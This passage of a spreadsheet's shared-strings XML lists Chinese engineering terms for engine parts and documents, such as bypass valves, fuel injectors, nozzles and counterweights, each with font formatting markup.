    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘式温度表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘式压力表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘头螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通阀故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通调整进气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>EL.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统，面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统，软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统，用户向导</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统安装向导</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配合螺栓孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓机械加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配平环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配套组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配重</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配重链轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配重说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷管冷却的热交换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷管冷却油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀辅助连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀清洁工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀套内部研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀套外部研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀提取器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷咀支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷漆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷漆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷气助推箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷枪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷砂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射控制滤网装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射控制屏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射系统布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷涂程序</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷涂和防锈规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷雾器穿孔器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷雾嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷雾嘴，带法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷雾嘴，内螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油管护罩总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器回油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器检查</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器喷嘴检修</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器套筒布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器体备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器铣刀及研磨轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴安装和转子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴环中心键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴冷却管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴冷却器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴冷却水模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴里的螺旋桨适配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴清洗工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴热处理生产规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴设计数据要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴试验装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴钻孔图</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀插头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀管，起动空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀管模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀管延伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀节</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>疲劳测试试验台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏心杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏移</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡环安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重，工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
